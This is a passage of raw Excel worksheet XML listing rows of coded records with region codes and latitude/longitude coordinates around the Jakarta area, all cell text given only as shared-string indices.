        <v>18957</v>
      </c>
      <c r="Y1449" t="str">
        <f t="shared" si="22"/>
        <v>-6.19926,106.83380</v>
      </c>
    </row>
    <row r="1450" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1450">
        <v>108974</v>
      </c>
      <c r="B1450" s="1">
        <v>43886</v>
      </c>
      <c r="C1450">
        <v>0</v>
      </c>
      <c r="D1450" t="s">
        <v>22</v>
      </c>
      <c r="E1450" t="s">
        <v>23</v>
      </c>
      <c r="F1450" t="s">
        <v>5049</v>
      </c>
      <c r="G1450" t="s">
        <v>5050</v>
      </c>
      <c r="H1450" t="s">
        <v>26</v>
      </c>
      <c r="I1450" t="s">
        <v>2005</v>
      </c>
      <c r="J1450" t="s">
        <v>2785</v>
      </c>
      <c r="L1450" t="s">
        <v>5051</v>
      </c>
      <c r="M1450">
        <v>3174040005</v>
      </c>
      <c r="N1450">
        <v>3174040</v>
      </c>
      <c r="O1450">
        <v>3174</v>
      </c>
      <c r="P1450">
        <v>31</v>
      </c>
      <c r="Q1450" t="s">
        <v>376</v>
      </c>
      <c r="R1450" t="s">
        <v>377</v>
      </c>
      <c r="S1450" t="s">
        <v>32</v>
      </c>
      <c r="T1450" t="s">
        <v>33</v>
      </c>
      <c r="U1450" s="5">
        <v>10678990</v>
      </c>
      <c r="V1450" s="5" t="s">
        <v>15757</v>
      </c>
      <c r="W1450" s="5">
        <v>-616116</v>
      </c>
      <c r="X1450" t="s">
        <v>19527</v>
      </c>
      <c r="Y1450" t="str">
        <f t="shared" si="22"/>
        <v>-6.16116,106.78990</v>
      </c>
    </row>
    <row r="1451" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1451">
        <v>108975</v>
      </c>
      <c r="B1451" s="1">
        <v>43886</v>
      </c>
      <c r="C1451">
        <v>0</v>
      </c>
      <c r="D1451" t="s">
        <v>22</v>
      </c>
      <c r="E1451" t="s">
        <v>23</v>
      </c>
      <c r="F1451" t="s">
        <v>5052</v>
      </c>
      <c r="G1451" t="s">
        <v>5053</v>
      </c>
      <c r="H1451" t="s">
        <v>26</v>
      </c>
      <c r="I1451" t="s">
        <v>131</v>
      </c>
      <c r="J1451" t="s">
        <v>2627</v>
      </c>
      <c r="L1451" t="s">
        <v>5054</v>
      </c>
      <c r="M1451">
        <v>3275040006</v>
      </c>
      <c r="N1451">
        <v>3275040</v>
      </c>
      <c r="O1451">
        <v>3275</v>
      </c>
      <c r="P1451">
        <v>32</v>
      </c>
      <c r="Q1451" t="s">
        <v>2185</v>
      </c>
      <c r="R1451" t="s">
        <v>100</v>
      </c>
      <c r="S1451" t="s">
        <v>41</v>
      </c>
      <c r="T1451" t="s">
        <v>42</v>
      </c>
      <c r="U1451" s="5">
        <v>10701254</v>
      </c>
      <c r="V1451" s="5" t="s">
        <v>15758</v>
      </c>
      <c r="W1451" s="5">
        <v>-623775</v>
      </c>
      <c r="X1451" t="s">
        <v>19528</v>
      </c>
      <c r="Y1451" t="str">
        <f t="shared" si="22"/>
        <v>-6.23775,107.01254</v>
      </c>
    </row>
    <row r="1452" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1452">
        <v>108976</v>
      </c>
      <c r="B1452" s="1">
        <v>43886</v>
      </c>
      <c r="C1452">
        <v>0</v>
      </c>
      <c r="D1452" t="s">
        <v>22</v>
      </c>
      <c r="E1452" t="s">
        <v>23</v>
      </c>
      <c r="F1452" t="s">
        <v>5055</v>
      </c>
      <c r="G1452" t="s">
        <v>5056</v>
      </c>
      <c r="H1452" t="s">
        <v>26</v>
      </c>
      <c r="I1452" t="s">
        <v>197</v>
      </c>
      <c r="J1452" t="s">
        <v>2627</v>
      </c>
      <c r="M1452">
        <v>3275060005</v>
      </c>
      <c r="N1452">
        <v>3275060</v>
      </c>
      <c r="O1452">
        <v>3275</v>
      </c>
      <c r="P1452">
        <v>32</v>
      </c>
      <c r="Q1452" t="s">
        <v>3526</v>
      </c>
      <c r="R1452" t="s">
        <v>114</v>
      </c>
      <c r="S1452" t="s">
        <v>41</v>
      </c>
      <c r="T1452" t="s">
        <v>42</v>
      </c>
      <c r="U1452" s="5">
        <v>10695916</v>
      </c>
      <c r="V1452" s="5" t="s">
        <v>15759</v>
      </c>
      <c r="W1452" s="5">
        <v>-621717</v>
      </c>
      <c r="X1452" t="s">
        <v>19529</v>
      </c>
      <c r="Y1452" t="str">
        <f t="shared" si="22"/>
        <v>-6.21717,106.95916</v>
      </c>
    </row>
    <row r="1453" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1453">
        <v>108977</v>
      </c>
      <c r="B1453" s="1">
        <v>43886</v>
      </c>
      <c r="C1453">
        <v>0</v>
      </c>
      <c r="D1453" t="s">
        <v>22</v>
      </c>
      <c r="E1453" t="s">
        <v>23</v>
      </c>
      <c r="F1453" t="s">
        <v>5057</v>
      </c>
      <c r="G1453" t="s">
        <v>5058</v>
      </c>
      <c r="H1453" t="s">
        <v>26</v>
      </c>
      <c r="I1453" t="s">
        <v>1971</v>
      </c>
      <c r="J1453" t="s">
        <v>5059</v>
      </c>
      <c r="L1453" t="s">
        <v>5060</v>
      </c>
      <c r="M1453">
        <v>3173060003</v>
      </c>
      <c r="N1453">
        <v>3173060</v>
      </c>
      <c r="O1453">
        <v>3173</v>
      </c>
      <c r="P1453">
        <v>31</v>
      </c>
      <c r="Q1453" t="s">
        <v>3773</v>
      </c>
      <c r="R1453" t="s">
        <v>61</v>
      </c>
      <c r="S1453" t="s">
        <v>62</v>
      </c>
      <c r="T1453" t="s">
        <v>33</v>
      </c>
      <c r="U1453" s="5">
        <v>10687206</v>
      </c>
      <c r="V1453" s="5" t="s">
        <v>15760</v>
      </c>
      <c r="W1453" s="5">
        <v>-616361</v>
      </c>
      <c r="X1453" t="s">
        <v>19166</v>
      </c>
      <c r="Y1453" t="str">
        <f t="shared" si="22"/>
        <v>-6.16361,106.87206</v>
      </c>
    </row>
    <row r="1454" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1454">
        <v>108978</v>
      </c>
      <c r="B1454" s="1">
        <v>43886</v>
      </c>
      <c r="C1454">
        <v>0</v>
      </c>
      <c r="D1454" t="s">
        <v>22</v>
      </c>
      <c r="E1454" t="s">
        <v>23</v>
      </c>
      <c r="F1454" t="s">
        <v>5061</v>
      </c>
      <c r="G1454" t="s">
        <v>5062</v>
      </c>
      <c r="H1454" t="s">
        <v>26</v>
      </c>
      <c r="I1454" t="s">
        <v>36</v>
      </c>
      <c r="J1454" t="s">
        <v>3617</v>
      </c>
      <c r="L1454" t="s">
        <v>5063</v>
      </c>
      <c r="M1454">
        <v>3172060005</v>
      </c>
      <c r="N1454">
        <v>3172060</v>
      </c>
      <c r="O1454">
        <v>3172</v>
      </c>
      <c r="P1454">
        <v>31</v>
      </c>
      <c r="Q1454" t="s">
        <v>1019</v>
      </c>
      <c r="R1454" t="s">
        <v>48</v>
      </c>
      <c r="S1454" t="s">
        <v>49</v>
      </c>
      <c r="T1454" t="s">
        <v>33</v>
      </c>
      <c r="U1454" s="5">
        <v>10687674</v>
      </c>
      <c r="V1454" s="5" t="s">
        <v>15761</v>
      </c>
      <c r="W1454" s="5">
        <v>-621774</v>
      </c>
      <c r="X1454" t="s">
        <v>19530</v>
      </c>
      <c r="Y1454" t="str">
        <f t="shared" si="22"/>
        <v>-6.21774,106.87674</v>
      </c>
    </row>
    <row r="1455" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1455">
        <v>108979</v>
      </c>
      <c r="B1455" s="1">
        <v>43886</v>
      </c>
      <c r="C1455">
        <v>0</v>
      </c>
      <c r="D1455" t="s">
        <v>22</v>
      </c>
      <c r="E1455" t="s">
        <v>23</v>
      </c>
      <c r="F1455" t="s">
        <v>5064</v>
      </c>
      <c r="G1455" t="s">
        <v>5065</v>
      </c>
      <c r="H1455" t="s">
        <v>26</v>
      </c>
      <c r="I1455" t="s">
        <v>886</v>
      </c>
      <c r="J1455" t="s">
        <v>3135</v>
      </c>
      <c r="L1455" t="s">
        <v>5066</v>
      </c>
      <c r="M1455">
        <v>3671011008</v>
      </c>
      <c r="N1455">
        <v>3671011</v>
      </c>
      <c r="O1455">
        <v>3671</v>
      </c>
      <c r="P1455">
        <v>36</v>
      </c>
      <c r="Q1455" t="s">
        <v>700</v>
      </c>
      <c r="R1455" t="s">
        <v>701</v>
      </c>
      <c r="S1455" t="s">
        <v>201</v>
      </c>
      <c r="T1455" t="s">
        <v>171</v>
      </c>
      <c r="U1455" s="5">
        <v>10672540</v>
      </c>
      <c r="V1455" s="5" t="s">
        <v>15762</v>
      </c>
      <c r="W1455" s="5">
        <v>-622449</v>
      </c>
      <c r="X1455" t="s">
        <v>19531</v>
      </c>
      <c r="Y1455" t="str">
        <f t="shared" si="22"/>
        <v>-6.22449,106.72540</v>
      </c>
    </row>
    <row r="1456" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1456">
        <v>108980</v>
      </c>
      <c r="B1456" s="1">
        <v>43886</v>
      </c>
      <c r="C1456">
        <v>0</v>
      </c>
      <c r="D1456" t="s">
        <v>22</v>
      </c>
      <c r="E1456" t="s">
        <v>23</v>
      </c>
      <c r="F1456" t="s">
        <v>5067</v>
      </c>
      <c r="G1456" t="s">
        <v>5068</v>
      </c>
      <c r="H1456" t="s">
        <v>26</v>
      </c>
      <c r="I1456" t="s">
        <v>1447</v>
      </c>
      <c r="J1456" t="s">
        <v>5069</v>
      </c>
      <c r="M1456">
        <v>3175020002</v>
      </c>
      <c r="N1456">
        <v>3175020</v>
      </c>
      <c r="O1456">
        <v>3175</v>
      </c>
      <c r="P1456">
        <v>31</v>
      </c>
      <c r="Q1456" t="s">
        <v>4760</v>
      </c>
      <c r="R1456" t="s">
        <v>2228</v>
      </c>
      <c r="S1456" t="s">
        <v>547</v>
      </c>
      <c r="T1456" t="s">
        <v>33</v>
      </c>
      <c r="U1456" s="5">
        <v>10684466</v>
      </c>
      <c r="V1456" s="5" t="s">
        <v>15763</v>
      </c>
      <c r="W1456" s="5">
        <v>-613642</v>
      </c>
      <c r="X1456" t="s">
        <v>18571</v>
      </c>
      <c r="Y1456" t="str">
        <f t="shared" si="22"/>
        <v>-6.13642,106.84466</v>
      </c>
    </row>
    <row r="1457" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1457">
        <v>108981</v>
      </c>
      <c r="B1457" s="1">
        <v>43886</v>
      </c>
      <c r="C1457">
        <v>0</v>
      </c>
      <c r="D1457" t="s">
        <v>22</v>
      </c>
      <c r="E1457" t="s">
        <v>23</v>
      </c>
      <c r="F1457" t="s">
        <v>5070</v>
      </c>
      <c r="G1457" t="s">
        <v>5071</v>
      </c>
      <c r="H1457" t="s">
        <v>26</v>
      </c>
      <c r="I1457" t="s">
        <v>3407</v>
      </c>
      <c r="J1457" t="s">
        <v>374</v>
      </c>
      <c r="L1457" t="s">
        <v>5072</v>
      </c>
      <c r="M1457">
        <v>3174040005</v>
      </c>
      <c r="N1457">
        <v>3174040</v>
      </c>
      <c r="O1457">
        <v>3174</v>
      </c>
      <c r="P1457">
        <v>31</v>
      </c>
      <c r="Q1457" t="s">
        <v>376</v>
      </c>
      <c r="R1457" t="s">
        <v>377</v>
      </c>
      <c r="S1457" t="s">
        <v>32</v>
      </c>
      <c r="T1457" t="s">
        <v>33</v>
      </c>
      <c r="U1457" s="5">
        <v>10678814</v>
      </c>
      <c r="V1457" s="5" t="s">
        <v>15764</v>
      </c>
      <c r="W1457" s="5">
        <v>-616399</v>
      </c>
      <c r="X1457" t="s">
        <v>18884</v>
      </c>
      <c r="Y1457" t="str">
        <f t="shared" si="22"/>
        <v>-6.16399,106.78814</v>
      </c>
    </row>
    <row r="1458" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1458">
        <v>108982</v>
      </c>
      <c r="B1458" s="1">
        <v>43886</v>
      </c>
      <c r="C1458">
        <v>0</v>
      </c>
      <c r="D1458" t="s">
        <v>22</v>
      </c>
      <c r="E1458" t="s">
        <v>23</v>
      </c>
      <c r="F1458" t="s">
        <v>5073</v>
      </c>
      <c r="H1458" t="s">
        <v>26</v>
      </c>
      <c r="I1458" t="s">
        <v>1909</v>
      </c>
      <c r="J1458" t="s">
        <v>5074</v>
      </c>
      <c r="L1458" t="s">
        <v>5075</v>
      </c>
      <c r="M1458">
        <v>3174060007</v>
      </c>
      <c r="N1458">
        <v>3174060</v>
      </c>
      <c r="O1458">
        <v>3174</v>
      </c>
      <c r="P1458">
        <v>31</v>
      </c>
      <c r="Q1458" t="s">
        <v>5076</v>
      </c>
      <c r="R1458" t="s">
        <v>1762</v>
      </c>
      <c r="S1458" t="s">
        <v>32</v>
      </c>
      <c r="T1458" t="s">
        <v>33</v>
      </c>
      <c r="U1458" s="5">
        <v>10681160</v>
      </c>
      <c r="V1458" s="5" t="s">
        <v>15765</v>
      </c>
      <c r="W1458" s="5">
        <v>-614448</v>
      </c>
      <c r="X1458" t="s">
        <v>19532</v>
      </c>
      <c r="Y1458" t="str">
        <f t="shared" si="22"/>
        <v>-6.14448,106.81160</v>
      </c>
    </row>
    <row r="1459" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1459">
        <v>108983</v>
      </c>
      <c r="B1459" s="1">
        <v>43886</v>
      </c>
      <c r="C1459">
        <v>0</v>
      </c>
      <c r="D1459" t="s">
        <v>22</v>
      </c>
      <c r="E1459" t="s">
        <v>23</v>
      </c>
      <c r="F1459" t="s">
        <v>5077</v>
      </c>
      <c r="G1459" t="s">
        <v>5078</v>
      </c>
      <c r="H1459" t="s">
        <v>26</v>
      </c>
      <c r="I1459" t="s">
        <v>2962</v>
      </c>
      <c r="J1459" t="s">
        <v>2627</v>
      </c>
      <c r="M1459">
        <v>3275031003</v>
      </c>
      <c r="N1459">
        <v>3275031</v>
      </c>
      <c r="O1459">
        <v>3275</v>
      </c>
      <c r="P1459">
        <v>32</v>
      </c>
      <c r="Q1459" t="s">
        <v>988</v>
      </c>
      <c r="R1459" t="s">
        <v>574</v>
      </c>
      <c r="S1459" t="s">
        <v>41</v>
      </c>
      <c r="T1459" t="s">
        <v>42</v>
      </c>
      <c r="U1459" s="5">
        <v>10702128</v>
      </c>
      <c r="V1459" s="5" t="s">
        <v>15766</v>
      </c>
      <c r="W1459" s="5">
        <v>-628217</v>
      </c>
      <c r="X1459" t="s">
        <v>19533</v>
      </c>
      <c r="Y1459" t="str">
        <f t="shared" si="22"/>
        <v>-6.28217,107.02128</v>
      </c>
    </row>
    <row r="1460" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1460">
        <v>108984</v>
      </c>
      <c r="B1460" s="1">
        <v>43886</v>
      </c>
      <c r="C1460">
        <v>0</v>
      </c>
      <c r="D1460" t="s">
        <v>22</v>
      </c>
      <c r="E1460" t="s">
        <v>23</v>
      </c>
      <c r="F1460" t="s">
        <v>5079</v>
      </c>
      <c r="G1460" t="s">
        <v>5080</v>
      </c>
      <c r="H1460" t="s">
        <v>26</v>
      </c>
      <c r="I1460" t="s">
        <v>1689</v>
      </c>
      <c r="J1460" t="s">
        <v>3531</v>
      </c>
      <c r="L1460" t="s">
        <v>5081</v>
      </c>
      <c r="M1460">
        <v>3172090005</v>
      </c>
      <c r="N1460">
        <v>3172090</v>
      </c>
      <c r="O1460">
        <v>3172</v>
      </c>
      <c r="P1460">
        <v>31</v>
      </c>
      <c r="Q1460" t="s">
        <v>2749</v>
      </c>
      <c r="R1460" t="s">
        <v>890</v>
      </c>
      <c r="S1460" t="s">
        <v>49</v>
      </c>
      <c r="T1460" t="s">
        <v>33</v>
      </c>
      <c r="U1460" s="5">
        <v>10687753</v>
      </c>
      <c r="V1460" s="5" t="s">
        <v>15767</v>
      </c>
      <c r="W1460" s="5">
        <v>-619208</v>
      </c>
      <c r="X1460" t="s">
        <v>19534</v>
      </c>
      <c r="Y1460" t="str">
        <f t="shared" si="22"/>
        <v>-6.19208,106.87753</v>
      </c>
    </row>
    <row r="1461" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1461">
        <v>108985</v>
      </c>
      <c r="B1461" s="1">
        <v>43886</v>
      </c>
      <c r="C1461">
        <v>0</v>
      </c>
      <c r="D1461" t="s">
        <v>22</v>
      </c>
      <c r="E1461" t="s">
        <v>23</v>
      </c>
      <c r="F1461" t="s">
        <v>5082</v>
      </c>
      <c r="G1461" t="s">
        <v>5083</v>
      </c>
      <c r="H1461" t="s">
        <v>26</v>
      </c>
      <c r="I1461" t="s">
        <v>5084</v>
      </c>
      <c r="J1461" t="s">
        <v>5085</v>
      </c>
      <c r="L1461" t="s">
        <v>5086</v>
      </c>
      <c r="M1461">
        <v>3173030001</v>
      </c>
      <c r="N1461">
        <v>3173030</v>
      </c>
      <c r="O1461">
        <v>3173</v>
      </c>
      <c r="P1461">
        <v>31</v>
      </c>
      <c r="Q1461" t="s">
        <v>5087</v>
      </c>
      <c r="R1461" t="s">
        <v>3128</v>
      </c>
      <c r="S1461" t="s">
        <v>62</v>
      </c>
      <c r="T1461" t="s">
        <v>33</v>
      </c>
      <c r="U1461" s="5">
        <v>10684880</v>
      </c>
      <c r="V1461" s="5" t="s">
        <v>15768</v>
      </c>
      <c r="W1461" s="5">
        <v>-619364</v>
      </c>
      <c r="X1461" t="s">
        <v>19535</v>
      </c>
      <c r="Y1461" t="str">
        <f t="shared" si="22"/>
        <v>-6.19364,106.84880</v>
      </c>
    </row>
    <row r="1462" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1462">
        <v>108986</v>
      </c>
      <c r="B1462" s="1">
        <v>43886</v>
      </c>
      <c r="C1462">
        <v>0</v>
      </c>
      <c r="D1462" t="s">
        <v>22</v>
      </c>
      <c r="E1462" t="s">
        <v>23</v>
      </c>
      <c r="F1462" t="s">
        <v>5088</v>
      </c>
      <c r="H1462" t="s">
        <v>26</v>
      </c>
      <c r="I1462" t="s">
        <v>5089</v>
      </c>
      <c r="J1462" t="s">
        <v>5090</v>
      </c>
      <c r="L1462" t="s">
        <v>250</v>
      </c>
      <c r="M1462">
        <v>3174040004</v>
      </c>
      <c r="N1462">
        <v>3174040</v>
      </c>
      <c r="O1462">
        <v>3174</v>
      </c>
      <c r="P1462">
        <v>31</v>
      </c>
      <c r="Q1462" t="s">
        <v>5091</v>
      </c>
      <c r="R1462" t="s">
        <v>377</v>
      </c>
      <c r="S1462" t="s">
        <v>32</v>
      </c>
      <c r="T1462" t="s">
        <v>33</v>
      </c>
      <c r="U1462" s="5">
        <v>10679474</v>
      </c>
      <c r="V1462" s="5" t="s">
        <v>15769</v>
      </c>
      <c r="W1462" s="5">
        <v>-616353</v>
      </c>
      <c r="X1462" t="s">
        <v>19536</v>
      </c>
      <c r="Y1462" t="str">
        <f t="shared" si="22"/>
        <v>-6.16353,106.79474</v>
      </c>
    </row>
    <row r="1463" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1463">
        <v>108987</v>
      </c>
      <c r="B1463" s="1">
        <v>43886</v>
      </c>
      <c r="C1463">
        <v>0</v>
      </c>
      <c r="D1463" t="s">
        <v>22</v>
      </c>
      <c r="E1463" t="s">
        <v>23</v>
      </c>
      <c r="F1463" t="s">
        <v>5092</v>
      </c>
      <c r="H1463" t="s">
        <v>26</v>
      </c>
      <c r="I1463" t="s">
        <v>1624</v>
      </c>
      <c r="J1463" t="s">
        <v>2627</v>
      </c>
      <c r="L1463" t="s">
        <v>5093</v>
      </c>
      <c r="M1463">
        <v>3275070005</v>
      </c>
      <c r="N1463">
        <v>3275070</v>
      </c>
      <c r="O1463">
        <v>3275</v>
      </c>
      <c r="P1463">
        <v>32</v>
      </c>
      <c r="Q1463" t="s">
        <v>5094</v>
      </c>
      <c r="R1463" t="s">
        <v>3310</v>
      </c>
      <c r="S1463" t="s">
        <v>41</v>
      </c>
      <c r="T1463" t="s">
        <v>42</v>
      </c>
      <c r="U1463" s="5">
        <v>10702652</v>
      </c>
      <c r="V1463" s="5" t="s">
        <v>15770</v>
      </c>
      <c r="W1463" s="5">
        <v>-620370</v>
      </c>
      <c r="X1463" t="s">
        <v>19537</v>
      </c>
      <c r="Y1463" t="str">
        <f t="shared" si="22"/>
        <v>-6.20370,107.02652</v>
      </c>
    </row>
    <row r="1464" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1464">
        <v>108988</v>
      </c>
      <c r="B1464" s="1">
        <v>43886</v>
      </c>
      <c r="C1464">
        <v>0</v>
      </c>
      <c r="D1464" t="s">
        <v>22</v>
      </c>
      <c r="E1464" t="s">
        <v>23</v>
      </c>
      <c r="F1464" t="s">
        <v>5095</v>
      </c>
      <c r="G1464" t="s">
        <v>5096</v>
      </c>
      <c r="H1464" t="s">
        <v>26</v>
      </c>
      <c r="I1464" t="s">
        <v>592</v>
      </c>
      <c r="J1464" t="s">
        <v>2627</v>
      </c>
      <c r="L1464" t="s">
        <v>5097</v>
      </c>
      <c r="M1464">
        <v>3275050001</v>
      </c>
      <c r="N1464">
        <v>3275050</v>
      </c>
      <c r="O1464">
        <v>3275</v>
      </c>
      <c r="P1464">
        <v>32</v>
      </c>
      <c r="Q1464" t="s">
        <v>4376</v>
      </c>
      <c r="R1464" t="s">
        <v>955</v>
      </c>
      <c r="S1464" t="s">
        <v>41</v>
      </c>
      <c r="T1464" t="s">
        <v>42</v>
      </c>
      <c r="U1464" s="5">
        <v>10696087</v>
      </c>
      <c r="V1464" s="5" t="s">
        <v>15771</v>
      </c>
      <c r="W1464" s="5">
        <v>-627350</v>
      </c>
      <c r="X1464" t="s">
        <v>19538</v>
      </c>
      <c r="Y1464" t="str">
        <f t="shared" si="22"/>
        <v>-6.27350,106.96087</v>
      </c>
    </row>
    <row r="1465" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1465">
        <v>108989</v>
      </c>
      <c r="B1465" s="1">
        <v>43886</v>
      </c>
      <c r="C1465">
        <v>0</v>
      </c>
      <c r="D1465" t="s">
        <v>22</v>
      </c>
      <c r="E1465" t="s">
        <v>23</v>
      </c>
      <c r="F1465" t="s">
        <v>5098</v>
      </c>
      <c r="G1465" t="s">
        <v>5099</v>
      </c>
      <c r="H1465" t="s">
        <v>26</v>
      </c>
      <c r="I1465" t="s">
        <v>2962</v>
      </c>
      <c r="J1465" t="s">
        <v>5100</v>
      </c>
      <c r="L1465" t="s">
        <v>250</v>
      </c>
      <c r="M1465">
        <v>3172080003</v>
      </c>
      <c r="N1465">
        <v>3172080</v>
      </c>
      <c r="O1465">
        <v>3172</v>
      </c>
      <c r="P1465">
        <v>31</v>
      </c>
      <c r="Q1465" t="s">
        <v>2250</v>
      </c>
      <c r="R1465" t="s">
        <v>141</v>
      </c>
      <c r="S1465" t="s">
        <v>49</v>
      </c>
      <c r="T1465" t="s">
        <v>33</v>
      </c>
      <c r="U1465" s="5">
        <v>10696298</v>
      </c>
      <c r="V1465" s="5" t="s">
        <v>15772</v>
      </c>
      <c r="W1465" s="5">
        <v>-620876</v>
      </c>
      <c r="X1465" t="s">
        <v>19539</v>
      </c>
      <c r="Y1465" t="str">
        <f t="shared" si="22"/>
        <v>-6.20876,106.96298</v>
      </c>
    </row>
    <row r="1466" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1466">
        <v>108990</v>
      </c>
      <c r="B1466" s="1">
        <v>43886</v>
      </c>
      <c r="C1466">
        <v>0</v>
      </c>
      <c r="D1466" t="s">
        <v>22</v>
      </c>
      <c r="E1466" t="s">
        <v>23</v>
      </c>
      <c r="F1466" t="s">
        <v>5101</v>
      </c>
      <c r="H1466" t="s">
        <v>26</v>
      </c>
      <c r="I1466" t="s">
        <v>845</v>
      </c>
      <c r="J1466" t="s">
        <v>5102</v>
      </c>
      <c r="L1466" t="s">
        <v>5103</v>
      </c>
      <c r="M1466">
        <v>3174020002</v>
      </c>
      <c r="N1466">
        <v>3174020</v>
      </c>
      <c r="O1466">
        <v>3174</v>
      </c>
      <c r="P1466">
        <v>31</v>
      </c>
      <c r="Q1466" t="s">
        <v>5104</v>
      </c>
      <c r="R1466" t="s">
        <v>31</v>
      </c>
      <c r="S1466" t="s">
        <v>32</v>
      </c>
      <c r="T1466" t="s">
        <v>33</v>
      </c>
      <c r="U1466" s="5">
        <v>10678031</v>
      </c>
      <c r="V1466" s="5" t="s">
        <v>15773</v>
      </c>
      <c r="W1466" s="5">
        <v>-620870</v>
      </c>
      <c r="X1466" t="s">
        <v>19540</v>
      </c>
      <c r="Y1466" t="str">
        <f t="shared" si="22"/>
        <v>-6.20870,106.78031</v>
      </c>
    </row>
    <row r="1467" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1467">
        <v>108991</v>
      </c>
      <c r="B1467" s="1">
        <v>43886</v>
      </c>
      <c r="C1467">
        <v>0</v>
      </c>
      <c r="D1467" t="s">
        <v>22</v>
      </c>
      <c r="E1467" t="s">
        <v>23</v>
      </c>
      <c r="F1467" t="s">
        <v>5105</v>
      </c>
      <c r="G1467" t="s">
        <v>5106</v>
      </c>
      <c r="H1467" t="s">
        <v>26</v>
      </c>
      <c r="I1467" t="s">
        <v>2196</v>
      </c>
      <c r="J1467" t="s">
        <v>5107</v>
      </c>
      <c r="L1467" t="s">
        <v>5108</v>
      </c>
      <c r="M1467">
        <v>3174060001</v>
      </c>
      <c r="N1467">
        <v>3174060</v>
      </c>
      <c r="O1467">
        <v>3174</v>
      </c>
      <c r="P1467">
        <v>31</v>
      </c>
      <c r="Q1467" t="s">
        <v>4694</v>
      </c>
      <c r="R1467" t="s">
        <v>1762</v>
      </c>
      <c r="S1467" t="s">
        <v>32</v>
      </c>
      <c r="T1467" t="s">
        <v>33</v>
      </c>
      <c r="U1467" s="5">
        <v>10681515</v>
      </c>
      <c r="V1467" s="5" t="s">
        <v>15774</v>
      </c>
      <c r="W1467" s="5">
        <v>-615651</v>
      </c>
      <c r="X1467" t="s">
        <v>19541</v>
      </c>
      <c r="Y1467" t="str">
        <f t="shared" si="22"/>
        <v>-6.15651,106.81515</v>
      </c>
    </row>
    <row r="1468" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1468">
        <v>108992</v>
      </c>
      <c r="B1468" s="1">
        <v>43886</v>
      </c>
      <c r="C1468">
        <v>0</v>
      </c>
      <c r="D1468" t="s">
        <v>22</v>
      </c>
      <c r="E1468" t="s">
        <v>23</v>
      </c>
      <c r="F1468" t="s">
        <v>5109</v>
      </c>
      <c r="G1468" t="s">
        <v>5110</v>
      </c>
      <c r="H1468" t="s">
        <v>26</v>
      </c>
      <c r="I1468" t="s">
        <v>290</v>
      </c>
      <c r="J1468" t="s">
        <v>5111</v>
      </c>
      <c r="L1468" t="s">
        <v>5112</v>
      </c>
      <c r="M1468">
        <v>3171060010</v>
      </c>
      <c r="N1468">
        <v>3171060</v>
      </c>
      <c r="O1468">
        <v>3171</v>
      </c>
      <c r="P1468">
        <v>31</v>
      </c>
      <c r="Q1468" t="s">
        <v>5113</v>
      </c>
      <c r="R1468" t="s">
        <v>1236</v>
      </c>
      <c r="S1468" t="s">
        <v>108</v>
      </c>
      <c r="T1468" t="s">
        <v>33</v>
      </c>
      <c r="U1468" s="5">
        <v>10680730</v>
      </c>
      <c r="V1468" s="5" t="s">
        <v>15775</v>
      </c>
      <c r="W1468" s="5">
        <v>-622920</v>
      </c>
      <c r="X1468" t="s">
        <v>19542</v>
      </c>
      <c r="Y1468" t="str">
        <f t="shared" si="22"/>
        <v>-6.22920,106.80730</v>
      </c>
    </row>
    <row r="1469" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1469">
        <v>108993</v>
      </c>
      <c r="B1469" s="1">
        <v>43886</v>
      </c>
      <c r="C1469">
        <v>0</v>
      </c>
      <c r="D1469" t="s">
        <v>22</v>
      </c>
      <c r="E1469" t="s">
        <v>23</v>
      </c>
      <c r="F1469" t="s">
        <v>5114</v>
      </c>
      <c r="H1469" t="s">
        <v>26</v>
      </c>
      <c r="I1469" t="s">
        <v>1394</v>
      </c>
      <c r="J1469" t="s">
        <v>3438</v>
      </c>
      <c r="M1469">
        <v>3172090007</v>
      </c>
      <c r="N1469">
        <v>3172090</v>
      </c>
      <c r="O1469">
        <v>3172</v>
      </c>
      <c r="P1469">
        <v>31</v>
      </c>
      <c r="Q1469" t="s">
        <v>890</v>
      </c>
      <c r="R1469" t="s">
        <v>890</v>
      </c>
      <c r="S1469" t="s">
        <v>49</v>
      </c>
      <c r="T1469" t="s">
        <v>33</v>
      </c>
      <c r="U1469" s="5">
        <v>10690120</v>
      </c>
      <c r="V1469" s="5" t="s">
        <v>15776</v>
      </c>
      <c r="W1469" s="5">
        <v>-618033</v>
      </c>
      <c r="X1469" t="s">
        <v>19543</v>
      </c>
      <c r="Y1469" t="str">
        <f t="shared" si="22"/>
        <v>-6.18033,106.90120</v>
      </c>
    </row>
    <row r="1470" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1470">
        <v>108994</v>
      </c>
      <c r="B1470" s="1">
        <v>43886</v>
      </c>
      <c r="C1470">
        <v>0</v>
      </c>
      <c r="D1470" t="s">
        <v>22</v>
      </c>
      <c r="E1470" t="s">
        <v>23</v>
      </c>
      <c r="F1470" t="s">
        <v>5115</v>
      </c>
      <c r="H1470" t="s">
        <v>26</v>
      </c>
      <c r="I1470" t="s">
        <v>5116</v>
      </c>
      <c r="J1470" t="s">
        <v>5117</v>
      </c>
      <c r="L1470" t="s">
        <v>5118</v>
      </c>
      <c r="M1470">
        <v>3171100002</v>
      </c>
      <c r="N1470">
        <v>3171100</v>
      </c>
      <c r="O1470">
        <v>3171</v>
      </c>
      <c r="P1470">
        <v>31</v>
      </c>
      <c r="Q1470" t="s">
        <v>1870</v>
      </c>
      <c r="R1470" t="s">
        <v>107</v>
      </c>
      <c r="S1470" t="s">
        <v>108</v>
      </c>
      <c r="T1470" t="s">
